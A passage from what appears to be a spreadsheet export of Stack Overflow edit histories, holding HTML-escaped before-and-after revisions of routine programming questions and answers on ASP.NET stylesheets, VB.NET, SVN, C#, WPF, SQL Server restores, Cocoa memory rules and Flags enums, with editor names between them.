 &lt;p&gt; I'm working on a website which will switch to a new style on a set date. The site's built in semantic HTML and CSS, so the change should just require a CSS reference change. I'm working with a designer who will need to be able to see how it's looking, as well as a client who will need to be able to review content updates in the current look as well as design progress on the new look.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm planning to use a magic querystring value and / or a javascript link in the footer which writes out a cookie to select the new CSS page. We're working in ASP.NET 3.5. Any recommendations?&lt;/p&gt; _x000D_
 &lt;p&gt; I should mention that we're using IE Conditional Comments for IE8,7,and 6 support. I may create a function that does a replacement:&lt;/p&gt; _x000D_
 &lt;pre class="lang-xml prettyprint-override"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&amp;lt;link href="Style/&amp;lt;% GetCssRoot() %&amp;gt;.css" rel="stylesheet" type="text/css" /&amp;gt;_x000D_
&amp;lt;!--[if lte IE 8]&amp;gt;_x000D_
    &amp;lt;link type="text/css" href="Style/&amp;lt;% GetCssRoot() %&amp;gt;-ie8.css" rel="stylesheet" /&amp;gt;_x000D_
&amp;lt;![endif]--&amp;gt;_x000D_
&amp;lt;!--[if lte IE 7]&amp;gt;_x000D_
    &amp;lt;link type="text/css" href="Style/&amp;lt;% GetCssRoot() %&amp;gt;-ie7.css" rel="stylesheet" /&amp;gt;_x000D_
&amp;lt;![endif]--&amp;gt;_x000D_
&amp;lt;!--[if lte IE 6]&amp;gt;_x000D_
    &amp;lt;link type="text/css" href="Style/&amp;lt;% GetCssRoot() %&amp;gt;-ie6.css" rel="stylesheet" /&amp;gt;_x000D_
&amp;lt;![endif]--&amp;gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm working on a website which will switch to a new style on a set date. The site's built in semantic HTML and CSS, so the change should just require a CSS reference change. I'm working with a designer who will need to be able to see how it's looking, as well as a client who will need to be able to review content updates in the current look as well as design progress on the new look.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm planning to use a magic querystring value and / or a javascript link in the footer which writes out a cookie to select the new CSS page. We're working in ASP.NET 3.5. Any recommendations?&lt;/p&gt; _x000D_
 &lt;p&gt; I should mention that we're using IE Conditional Comments for IE8,7,and 6 support. I may create a function that does a replacement:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;&amp;lt;link href="Style/&amp;lt;% GetCssRoot() %&amp;gt;.css" rel="stylesheet" type="text/css" /&amp;gt;_x000D_
&amp;lt;!--[if lte IE 8]&amp;gt;_x000D_
    &amp;lt;link type="text/css" href="Style/&amp;lt;% GetCssRoot() %&amp;gt;-ie8.css" rel="stylesheet" /&amp;gt;_x000D_
&amp;lt;![endif]--&amp;gt;_x000D_
&amp;lt;!--[if lte IE 7]&amp;gt;_x000D_
    &amp;lt;link type="text/css" href="Style/&amp;lt;% GetCssRoot() %&amp;gt;-ie7.css" rel="stylesheet" /&amp;gt;_x000D_
&amp;lt;![endif]--&amp;gt;_x000D_
&amp;lt;!--[if lte IE 6]&amp;gt;_x000D_
    &amp;lt;link type="text/css" href="Style/&amp;lt;% GetCssRoot() %&amp;gt;-ie6.css" rel="stylesheet" /&amp;gt;_x000D_
&amp;lt;![endif]--&amp;gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>James Donnelly</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Does anyone here use VB.NET and have a strong preference for or against using &lt;code&gt;&lt;span class="diff-delete"&gt;IsNothing&lt;/span&gt;&lt;/code&gt; as opposed to &lt;code&gt;&lt;span class="diff-delete"&gt;Is Nothing&lt;/span&gt;&lt;/code&gt; &lt;span class="diff-delete"&gt;?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; for&lt;/span&gt; example&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="lang-vb s-code-block hljs vbnet"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-comment"&gt;'If IsNothing(anObject)'&lt;/span&gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; or&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="lang-vb s-code-block hljs vbnet"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;If&lt;/span&gt; anObject &lt;span class="hljs-built_in"&gt;Is&lt;/span&gt; &lt;span class="hljs-literal"&gt;Nothing&lt;/span&gt;...&lt;span class="hljs-comment"&gt;')&lt;/span&gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;EDIT:&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; If you think they're both equally acceptable, do you think it's best to pick one and stick with it, or is it OK to mix them?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Does anyone here use VB.NET and have a strong preference for or against using &lt;span class="diff-add"&gt;'IsNothing'&lt;/span&gt; as opposed to &lt;span class="diff-add"&gt;'Is Nothing'&lt;/span&gt; &lt;span class="diff-add"&gt;(for&lt;/span&gt; example&lt;span class="diff-add"&gt;, 'If IsNothing(anObject)'&lt;/span&gt; or&lt;span class="diff-add"&gt; If anObject Is Nothing...')? If so, why?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT:&lt;/span&gt; If you think they're both equally acceptable, do you think it's best to pick one and stick with it, or is it OK to mix them?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Luke Girvin</t>
  </si>
  <si>
    <t>NeverHopeless</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In my web application I have a file which hold the current revision number via &lt;code&gt;&lt;span class="diff-delete"&gt;$Rev$&lt;/span&gt;&lt;/code&gt;. This &lt;span class="diff-delete"&gt;works&lt;/span&gt; fine except if I don't make any changes to that file, it doesn't get committed.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Is there &lt;span class="diff-delete"&gt;any way&lt;/span&gt; I can force a single file to always get committed to the SVN server?&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;I'm using TortoiseSVN for Windows so any code or step-by-step instructions would be helpful.&lt;/em&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In my web application I have a file which hold the current revision number via &lt;span class="diff-add"&gt;$Rev$&lt;/span&gt;. This &lt;span class="diff-add"&gt;work&lt;/span&gt; fine except&lt;span class="diff-add"&gt;,&lt;/span&gt; if I don't make any changes to that file, it doesn't get committed.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Is there &lt;span class="diff-add"&gt;anyway&lt;/span&gt; I can force a single file to always get committed to the SVN server?&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;I'm using TortoiseSVN for Windows so any code or step-by-step instructions would be helpful.&lt;/em&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>GateKiller</t>
  </si>
  <si>
    <t>George Stocker</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I spend too much time trying to make my visual interfaces look good&lt;span class="diff-delete"&gt;, yet&lt;/span&gt;, while I'm pretty adept at finding the right match between usability and style&lt;span class="diff-delete"&gt;,&lt;/span&gt; one area I am hopeless at is making nice looking icons.&lt;/p&gt; _x000D_
 &lt;p&gt; How do you overcome this problem? &lt;span class="diff-delete"&gt;I'm&lt;/span&gt; thinking of images on buttons and the application icon.&lt;/p&gt; _x000D_
 &lt;p&gt; Do you rely on third party designers, in or out of house? &lt;span class="diff-delete"&gt;Do&lt;/span&gt; you know of some hidden website that offers lots of icons for us to use? &lt;span class="diff-delete"&gt; Google returns&lt;/span&gt; expensive packages&lt;span class="diff-delete"&gt;, sets&lt;/span&gt; that are &lt;span class="diff-delete"&gt;too&lt;/span&gt; specific&lt;span class="diff-delete"&gt; (millions&lt;/span&gt; of Star Trek icons&lt;span class="diff-delete"&gt;),&lt;/span&gt; or icons that look abysmal at 16x16 &lt;span class="diff-delete"&gt;(my&lt;/span&gt; preferred size on in-application buttons&lt;span class="diff-delete"&gt;)&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Help and advice&lt;/span&gt; appreciated.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I&lt;span class="diff-add"&gt; probably&lt;/span&gt; spend&lt;span class="diff-add"&gt; far&lt;/span&gt; too much time trying to make my visual interfaces look good,&lt;span class="diff-add"&gt; and&lt;/span&gt; while I'm pretty adept at finding the right match between usability and style one area I am hopeless at is making nice looking icons.&lt;/p&gt; _x000D_
 &lt;p&gt; How do you&lt;span class="diff-add"&gt; people&lt;/span&gt; overcome this&lt;span class="diff-add"&gt; (I'm sure common)&lt;/span&gt; problem? &lt;span class="diff-add"&gt; I'm&lt;/span&gt; thinking of&lt;span class="diff-add"&gt; things like&lt;/span&gt; images on buttons and&lt;span class="diff-add"&gt; perhaps most important of all,&lt;/span&gt; the&lt;span class="diff-add"&gt; actual&lt;/span&gt; application icon.&lt;/p&gt; _x000D_
 &lt;p&gt; Do you rely on third party designers, in or out of house? &lt;span class="diff-add"&gt; Or do&lt;/span&gt; you know of some hidden website that offers lots of icons for us to use? &lt;span class="diff-add"&gt; I've tried Google but I seem to find either&lt;/span&gt; expensive packages that are &lt;span class="diff-add"&gt;very&lt;/span&gt; specific&lt;span class="diff-add"&gt;, millions&lt;/span&gt; of Star Trek icons or icons that look abysmal at 16x16 &lt;span class="diff-add"&gt;which is my&lt;/span&gt; preferred size on in-application buttons.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Any help/advice&lt;/span&gt; appreciated.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Martin</t>
  </si>
  <si>
    <t>Dave Jarvis</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In C#, what is the difference between &lt;code&gt;String&lt;/code&gt; and &lt;code&gt;string&lt;/code&gt;? (note the case)&lt;span class="diff-delete"&gt; Example&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-built_in"&gt;string&lt;/span&gt; s = &lt;span class="hljs-string"&gt;"Hello, World"&lt;/span&gt;;_x000D_
_x000D_
String S = &lt;span class="hljs-string"&gt;"Hello, World"&lt;/span&gt;;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; What are the guidelines for the use of each? And what are the differences?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In C#, what is the difference between &lt;code&gt;String&lt;/code&gt; and &lt;code&gt;string&lt;/code&gt;? (note the case)&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Example&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-built_in"&gt;string&lt;/span&gt; s = &lt;span class="hljs-string"&gt;"Hello, World"&lt;/span&gt;;_x000D_
_x000D_
String S = &lt;span class="hljs-string"&gt;"Hello, World"&lt;/span&gt;;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; What are the guidelines for the use of each? And what are the differences?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>jazzpi</t>
  </si>
  <si>
    <t>Bhat</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Can anyone point me to a good resource (or throw me a clue) to show me how to do databinding to controls (combobox, listbox, etc.) in WPF? I'm at a bit of a loss when all my WinForms niceities are taken away from me, and I'm not all that bright to start with...&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Can anyone point me to a good resource (or throw me a clue) to show me how to do databinding to controls (combobox, listbox, etc.) in WPF? I'm at a bit of a loss when all my WinForms niceities are taken away from me, and I'm not all that bright to start with...&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Many Thanks, my fellow Stackies.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>theog</t>
  </si>
  <si>
    <t>Rais Alam</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; My opinions on these are:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; No, table names should be singular.&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; While it appears to make sense for the simple selection (&lt;code&gt;select * from Orders&lt;/code&gt;) it makes less sense for the OO equivalent (&lt;code&gt;Orders x = new Orders&lt;/code&gt;).&lt;/p&gt; _x000D_
 &lt;p&gt; A table in a DB is really the set of that entity, it makes more sense once you're using set-logic:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;select Orders.*_x000D_
from Orders inner join Products_x000D_
    on Orders.Key = Products.Key_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; That last line, the actual logic of the join, looks confusing with plural table names.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm not sure about always using an alias (as Matt suggests) clears that up.&lt;/p&gt; _x000D_
 &lt;ol start="2"&gt; _x000D_
  &lt;li&gt;&lt;p&gt; They should be singular as they only hold 1 property&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Never, if the column name is ambiguous (as above where they both have a column called [Key]) the name of the table (or its alias) can distinguish them well enough. You want queries to be quick to type and simple - prefixes add unnecessary complexity.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Whatever you want, I'd suggest &lt;span class="diff-delete"&gt;PascalCase&lt;/span&gt;&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; I don't think there's one set of absolute guidelines on any of these.&lt;/p&gt; _x000D_
 &lt;p&gt; As long as whatever you pick is consistent across the application or DB I don't think it really matters.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; My opinions on these are:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt; No, table names should be singular.&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; While it appears to make sense for the simple selection (&lt;code&gt;select * from Orders&lt;/code&gt;) it makes less sense for the OO equivalent (&lt;code&gt;Orders x = new Orders&lt;/code&gt;).&lt;/p&gt; _x000D_
 &lt;p&gt; A table in a DB is really the set of that entity, it makes more sense once you're using set-logic:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;select Orders.*_x000D_
from Orders inner join Products_x000D_
    on Orders.Key = Products.Key_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; That last line, the actual logic of the join, looks confusing with plural table names.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm not sure about always using an alias (as Matt suggests) clears that up.&lt;/p&gt; _x000D_
 &lt;ol start="2"&gt; _x000D_
  &lt;li&gt;&lt;p&gt; They should be singular as they only hold 1 property&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Never, if the column name is ambiguous (as above where they both have a column called [Key]) the name of the table (or its alias) can distinguish them well enough. You want queries to be quick to type and simple - prefixes add unnecessary complexity.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Whatever you want, I'd suggest &lt;span class="diff-add"&gt;CapitalCase&lt;/span&gt;&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; I don't think there's one set of absolute guidelines on any of these.&lt;/p&gt; _x000D_
 &lt;p&gt; As long as whatever you pick is consistent across the application or DB I don't think it really matters.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Keith</t>
  </si>
  <si>
    <t>ErikE</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; GateKiller,&lt;/p&gt; _x000D_
 &lt;p&gt; In simple terms (and not a copy-paste out of the SQLBOL) so you can understand the concepts:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.sqlmvp.org/restore-database-with-norecovery/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;RESTORE WITH RECOVERY&lt;/span&gt;&lt;/a&gt; uses the backup media file (eg. fulldata.bak) to restore the database to back to the time that backup file was created&lt;span class="diff-delete"&gt;. In this case, the restore sequence can restore other backups and roll them forward&lt;/span&gt;. &lt;span class="diff-delete"&gt;This&lt;/span&gt; is great if you want to go back in time to restore the database to an earlier state - like when developing a system.&lt;/p&gt; _x000D_
 &lt;p&gt; If you want to restore the database TO THE VERY LATEST DATA, (i.e. like if your doing a system Disaster Recovery and you cannot lose any data) then you want to restore that backup AND THEN all the transaction logs created since that backup. This is when you use RESTORE NORECOVERY. It will allow you to restore the later transaction logs right up to the point of failure (as long as you have them).&lt;/p&gt; _x000D_
 &lt;p&gt; RECOVERY WITH STANDBY is the ability to restore the database up to a parital date (like NORECOVERY above) but to allow the database still to be used READONLY. New transaction logs can still be applied to the database to keep it up to date (a standby server). Use this when it would take too long to restore a full database in order to Return To Operations the system. (ie. if you have a multi TB database that would take 16 hours to restore, but could receive transaction log updates every 15 minutes).&lt;/p&gt; _x000D_
 &lt;p&gt; This is a bit like a mirror server - but without having "every single transaction" send to the backup server in real time.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; GateKiller,&lt;/p&gt; _x000D_
 &lt;p&gt; In simple terms (and not a copy-paste out of the SQLBOL) so you can understand the concepts:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; RESTORE WITH RECOVERY&lt;/span&gt; uses the backup media file (eg. fulldata.bak) to restore the database to back to the time that backup file was created. &lt;span class="diff-add"&gt; This&lt;/span&gt; is great if you want to go back in time to restore the database to an earlier state - like when developing a system.&lt;/p&gt; _x000D_
 &lt;p&gt; If you want to restore the database TO THE VERY LATEST DATA, (i.e. like if your doing a system Disaster Recovery and you cannot lose any data) then you want to restore that backup AND THEN all the transaction logs created since that backup. This is when you use RESTORE NORECOVERY. It will allow you to restore the later transaction logs right up to the point of failure (as long as you have them).&lt;/p&gt; _x000D_
 &lt;p&gt; RECOVERY WITH STANDBY is the ability to restore the database up to a parital date (like NORECOVERY above) but to allow the database still to be used READONLY. New transaction logs can still be applied to the database to keep it up to date (a standby server). Use this when it would take too long to restore a full database in order to Return To Operations the system. (ie. if you have a multi TB database that would take 16 hours to restore, but could receive transaction log updates every 15 minutes).&lt;/p&gt; _x000D_
 &lt;p&gt; This is a bit like a mirror server - but without having "every single transaction" send to the backup server in real time.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jason Clark</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you understand the process of retain/release then there are two golden rules that are "duh" obvious to established Cocoa programmers, but unfortunately are rarely spelled out this clearly for newcomers.&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;If a function which returns an object has 'alloc', 'create' or 'copy' in its name then the object is yours. You must call [object release] when you are finished with it. Or CFRelease(object) if it's a Core-Foundation object.&lt;/span&gt;&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;If it does NOT have one of these words in its name then the object belongs to someone else. You must call [object retain] if you wish to keep the object after the end of your function.&lt;/span&gt;&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; You would be well served to also follow this convention in functions you create yourself.&lt;/p&gt; _x000D_
 &lt;p&gt;(Nitpickers: Yes, there are unfortunately a few API calls that are exceptions to these rules but they are rare).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you understand the process of retain/release then there are two golden rules that are "duh" obvious to established Cocoa programmers, but unfortunately are rarely spelled out this clearly for newcomers.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; **1) If a function which returns an object has 'alloc', 'create' or 'copy' in its name then the object is yours. You must call [object release] when you are finished with it. Or CFRelease(object) if it's a Core-Foundation object.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;ol start="2"&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; If it does NOT have one of these words in its name then the object belongs to someone else. You must call [object retain] if you wish to keep the object after the end of your function.**&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; You would be well served to also follow this convention in functions you create yourself.&lt;/p&gt; _x000D_
 &lt;p&gt;(Nitpickers: Yes, there are unfortunately a few API calls that are exceptions to these rules but they are rare).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Andrew Grant</t>
  </si>
  <si>
    <t>adamse</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm using Visual C++ 2003 to debug a program remotely via TCP/IP.&lt;/p&gt; _x000D_
 &lt;p&gt; I had set the &lt;code&gt;&lt;span class="diff-delete"&gt;Win32 exception c00000005&lt;/span&gt;&lt;/code&gt;, &lt;code&gt;&lt;span class="diff-delete"&gt;Access violation&lt;/span&gt;&lt;/code&gt; to break into the debugger when thrown. Then, I set it back to &lt;code&gt;&lt;span class="diff-delete"&gt;Use parent setting.&lt;/span&gt;&lt;/code&gt; The setting for the parent, &lt;code&gt;&lt;span class="diff-delete"&gt;Win32 Exceptions&lt;/span&gt;&lt;/code&gt;, is to continue when the exception is thrown.&lt;/p&gt; _x000D_
 &lt;p&gt; Now, when I debug the program, it breaks each time that exception is thrown, forcing me to click &lt;code&gt;&lt;span class="diff-delete"&gt;Continue&lt;/span&gt;&lt;/code&gt; to let it keep debugging. How do I get it to stop breaking like this?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm using Visual C++ 2003 to debug a program remotely via TCP/IP.&lt;/p&gt; _x000D_
 &lt;p&gt; I had set the &lt;span class="diff-add"&gt;Win32 exception c00000005&lt;/span&gt;, &lt;span class="diff-add"&gt;"Access violation,"&lt;/span&gt; to break into the debugger when thrown. Then, I set it back to &lt;span class="diff-add"&gt;"Use parent setting."&lt;/span&gt; The setting for the parent, &lt;span class="diff-add"&gt;Win32 Exceptions&lt;/span&gt;, is to continue when the exception is thrown.&lt;/p&gt; _x000D_
 &lt;p&gt; Now, when I debug the program, it breaks each time that exception is thrown, forcing me to click &lt;span class="diff-add"&gt;Continue&lt;/span&gt; to let it keep debugging. How do I get it to stop breaking like this?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Onur A.</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Imagine an object you are working with has a collection of other objects associated with it, for example the Controls collection on a WinForm. You want to check for a certain object in the collection, but the collection doesn't have a &lt;code&gt;&lt;span class="diff-delete"&gt;Contains()&lt;/span&gt;&lt;/code&gt; method. There are several ways of dealing with this.&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;span class="diff-delete"&gt; Implement your own &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Contains()&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; method by looping through all items in the collection to see if one of them is what you are looking for. This seems to be the "best practice" approach.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;span class="diff-delete"&gt; I recently came across some code where instead of a loop, there was an attempt to access the object inside a try statement, as follows:&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;p&gt;&lt;span class="diff-delete"&gt; try&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; {&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; Object aObject = myCollection[myObject];&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; }&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; catch(Exception e)&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; {&lt;/span&gt;&lt;br&gt;&lt;span class="diff-delete"&gt; //if this is thrown, then the object doesn't exist in the collection }&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; My question is how poor of a programming practice do you consider the second option be and why? How is the performance of it compared to a loop through the collection?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Imagine an object you are working with has a collection of other objects associated with it, for example the Controls collection on a WinForm. You want to check for a certain object in the collection, but the collection doesn't have a &lt;span class="diff-add"&gt;Contains()&lt;/span&gt; method. There are several ways of dealing with this.&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; Implement your own Contains() method by looping through all items in the collection to see if one of them is what you are looking for. This seems to be the "best practice" approach.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; I recently came across some code where instead of a loop, there was an attempt to access the object inside a try statement, as follows:&lt;/span&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;try  _x000D_
{  _x000D_
    Object aObject = myCollection[myObject];  _x000D_
}  _x000D_
catch(Exception e)  _x000D_
{  _x000D_
    //if this is thrown, then the object doesn't exist in the collection_x000D_
}_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; My question is how poor of a programming practice do you consider the second option be and why? How is the performance of it compared to a loop through the collection?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>goric</t>
  </si>
  <si>
    <t>Danny Beckett</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can also do this&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;[Flags]_x000D_
public enum MyEnum_x000D_
{_x000D_
    None   = 0,_x000D_
    First  = 1 &amp;lt;&amp;lt; 0,_x000D_
    Second = 1 &amp;lt;&amp;lt; 1,_x000D_
    Third  = 1 &amp;lt;&amp;lt; 2,_x000D_
    Fourth = 1 &amp;lt;&amp;lt; 3&lt;span class="diff-delete"&gt;,_x000D_
    All = ~(-1 &amp;lt;&amp;lt; 4)&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I find the bit-shifting easier than typing 4,8,16,32 and so on. It has no impact on your code because it's all done at compile time&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
